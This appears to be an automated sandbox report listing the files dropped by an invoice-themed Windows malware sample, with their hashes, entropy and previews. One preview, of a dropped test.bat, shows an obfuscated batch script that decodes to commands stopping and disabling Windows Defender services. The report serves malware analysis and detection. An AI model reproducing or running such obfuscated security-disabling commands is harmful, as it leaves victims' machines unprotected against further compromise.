                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):14734
                                                                                                                                                            Entropy (8bit):4.993014478972177
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
                                                                                                                                                            MD5:8D5E194411E038C060288366D6766D3D
                                                                                                                                                            SHA1:DC1A8229ED0B909042065EA69253E86E86D71C88
                                                                                                                                                            SHA-256:44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
                                                                                                                                                            SHA-512:21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):22260
                                                                                                                                                            Entropy (8bit):5.601283657543269
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:qtCDLC0LZiSouJ0UCiJ3ISBKnOul6o827Y9glSJUeR61BMrmYZSRV7kb6BDc264c:xMSog7Y4KOulP8ilXextAQb6pc
                                                                                                                                                            MD5:90158536358DDD647ED0BB31C903AFBB
                                                                                                                                                            SHA1:E8BDE2F6DB92DAC14E9AF7F408800D0089F4B8A5
                                                                                                                                                            SHA-256:A17A093DA8B5074DA5F3A77C9092F799D78DB31218A2125BA88E36F537D9B838
                                                                                                                                                            SHA-512:A3C2DA2F645A1AB4C1F004A900CF89C6F1366018433D0EB89B465F0363E548DD466353049C233329A66937DCBBB6BCD37A89C612AD968C1EB460784E9EA2EF86
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: @...e...........v...........P.B.'.....~.:............@..........H...............<@.^.L."My...:P..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe
                                                                                                                                                            Process:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):91000
                                                                                                                                                            Entropy (8bit):6.241345766746317
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                                                                            MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                                                            SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                                                                            SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                                                                            SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                            • Filename: PurchaseOrdersCSTtyres004786587.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: 3zKVfxhs18.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: AWB783079370872.docm, Detection: malicious, Browse
                                                                                                                                                            • Filename: DETALLE DE TRANSFERENCIA BANCO AGRARO DE COLOMBIA.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: CN-Invoice-XXXXX9808-19011143287990.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: Payment Advice 170221.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: Payment Receipt.jar, Detection: malicious, Browse
                                                                                                                                                            • Filename: miner.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: 875666665.xlsm.xlsm, Detection: malicious, Browse
                                                                                                                                                            • Filename: DOCX.doc.doc, Detection: malicious, Browse
                                                                                                                                                            • Filename: v.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: uaa.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: r.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: j.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: 99.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: m.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: n.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: DdV1LG7bLJ.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: TBN HMX SPECS.xlsm, Detection: malicious, Browse
                                                                                                                                                            • Filename: VESSEL CONTACT DETAILS, LOAD & DISPORT.doc, Detection: malicious, Browse
                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\test.bat
                                                                                                                                                            Process:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:modified
                                                                                                                                                            Size (bytes):8399
                                                                                                                                                            Entropy (8bit):4.665734428420432
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                                                                            MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                                                                            SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                                                                            SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                                                                            SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\1cc51949-2752-4134-b6cf-961241419db1\AdvancedRun.exe
                                                                                                                                                            Process:C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):91000
                                                                                                                                                            Entropy (8bit):6.241345766746317
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                                                                            MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                                                            SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                                                                            SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                                                                            SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\1cc51949-2752-4134-b6cf-961241419db1\test.bat
                                                                                                                                                            Process:C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8399
                                                                                                                                                            Entropy (8bit):4.665734428420432
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                                                                            MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                                                                            SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                                                                            SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                                                                            SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gccbelfa.ghx.ps1
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: 1
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h2nvm502.qyi.psm1
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: 1
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hkti2vm4.tb4.ps1
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: 1
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sw14s2mf.ya1.psm1
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: 1
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe
                                                                                                                                                            Process:C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):91000
                                                                                                                                                            Entropy (8bit):6.241345766746317
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                                                                            MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                                                            SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                                                                            SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                                                                            SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\test.bat
                                                                                                                                                            Process:C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8399
                                                                                                                                                            Entropy (8bit):4.665734428420432
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                                                                            MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                                                                            SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                                                                            SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                                                                            SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                                                                            C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat
                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):232
                                                                                                                                                            Entropy (8bit):7.024371743172393
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:X4LDAnybgCFcpJSQwP4d7ZrqJgTFwoaw+9XU4:X4LEnybgCFCtvd7ZrCgpwoaw+Z9
                                                                                                                                                            MD5:32D0AAE13696FF7F8AF33B2D22451028
                                                                                                                                                            SHA1:EF80C4E0DB2AE8EF288027C9D3518E6950B583A4
                                                                                                                                                            SHA-256:5347661365E7AD2C1ACC27AB0D150FFA097D9246BB3626FCA06989E976E8DD29
                                                                                                                                                            SHA-512:1D77FC13512C0DBC4EFD7A66ACB502481E4EFA0FB73D0C7D0942448A72B9B05BA1EA78DDF0BE966363C2E3122E0B631DB7630D044D08C1E1D32B9FB025C356A5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.
                                                                                                                                                            C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8
                                                                                                                                                            Entropy (8bit):2.75
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:KlC:KlC
                                                                                                                                                            MD5:204A8C77A1EDD9D15835E0795675E4C0
                                                                                                                                                            SHA1:9CDB9CE62C195B5E2C3AFE4EB31530F6BB872ABC
                                                                                                                                                            SHA-256:290483F25B571CCD06B717B23E0C8A27E760D549E30AECD2297973B845590AD4
                                                                                                                                                            SHA-512:97A1E46E222A40B394B053E599D48CA50AF1DF97E3D124DD03538D12B636FFA0A796DCF1F8DC313C4AFB207EB1A583347D683C92B56DC879F3299F76CF4D8ACC
                                                                                                                                                            Malicious:true
                                                                                                                                                            Preview: ....H..H
                                                                                                                                                            C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\storage.dat
                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):327432
                                                                                                                                                            Entropy (8bit):7.99938831605763
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:6144:oX44S90aTiB66x3Pl6nGV4bfD6wXPIZ9iBj0UeprGm2d7Tm:LkjYGsfGUc9iB4UeprKdnm
                                                                                                                                                            MD5:7E8F4A764B981D5B82D1CC49D341E9C6
                                                                                                                                                            SHA1:D9F0685A028FB219E1A6286AEFB7D6FCFC778B85
                                                                                                                                                            SHA-256:0BD3AAC12623520C4E2031C8B96B4A154702F36F97F643158E91E987D317B480
                                                                                                                                                            SHA-512:880E46504FCFB4B15B86B9D8087BA88E6C4950E433616EBB637799F42B081ABF6F07508943ECB1F786B2A89E751F5AE62D750BDCFFDDF535D600CF66EC44E926
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: pT..!..W..G.J..a.).@.i..wpK.so@...5.=.^..Q.oy.=e@9.B...F..09u"3.. 0t..RDn_4d.....E...i......~...|..fX_...Xf.p^......>a..$...e.6:7d.(a.A...=.)*.....{B.[...y%.*..i.Q.<..xt.X..H.. ..HF7g...I.*3.{.n....L.y;i..s-....(5i...........J.5b7}..fK..HV..,...0.... ....n.w6PMl.......v."".v.......#..X.a....../...cC...i..l{>5n.._+.e.d'...}...[..../...D.t..GVp.zz......(...o......b...+`J.{....hS1G.^*I..v&.jm.#u..1..Mg!.E..U.T.....6.2>...6.l.K.w"o..E..."K%{....z.7....<...,....]t.:.....[.Z.u...3X8.QI..j_.&..N..q.e.2...6.R.~..9.Bq..A.v.6.G..#y.....O....Z)G...w..E..k(....+..O..........Vg.2xC......O...jc.....z..~.P...q../.-.'.h.._.cj.=..B.x.Q9.pu.|i4...i...;O...n.?.,. ....v?.5}.OY@.dG|<.._[.69@.2..m..I..oP=...xrK.?............b..5....i&...l.c\b}..Q..O+.V.mJ.....pz....>F.......H...6$...d...|m...N..1.R..B.i..........$....$........CY}..$....r.....H...8...li.....7 P......?h....R.iF..6...q(.@LI.s..+K.....?m..H....*. l..&<}....`|.B....3.....I..o...u1..8i=.z.W..7
                                                                                                                                                            C:\Users\user\Documents\20210222\PowerShell_transcript.138727.gLFcjFHw.20210222074542.txt
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1602
                                                                                                                                                            Entropy (8bit):5.3871208811732245
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:BZfv/EoO+SmFvqDYB1ZNm3Z6v/EoO+SmFvqDYB1ZA:BZ3/EN0VqDo1Zc3Zm/EN0VqDo1ZA
                                                                                                                                                            MD5:D214FCFF7A908A665304A0CCFB48FAAE
                                                                                                                                                            SHA1:AB734373D2E75D98767DE27FBEA9DA097DFD9D9C
                                                                                                                                                            SHA-256:654D84F927F7EDACE9D05BAA446FB351B99A0FF2BFF514AAAC6AF0F7CE1D1FE7
                                                                                                                                                            SHA-512:A56F15092553F2012D3C8EBE2B72C06765311AF0C06AA2C05859A7B644F9FBFDE830C6A5071F2D3924367BABCF24969E9ECEF97BBA77D6AB4E5B61B55FD81EF4
                                                                                                                                                            Malicious:false
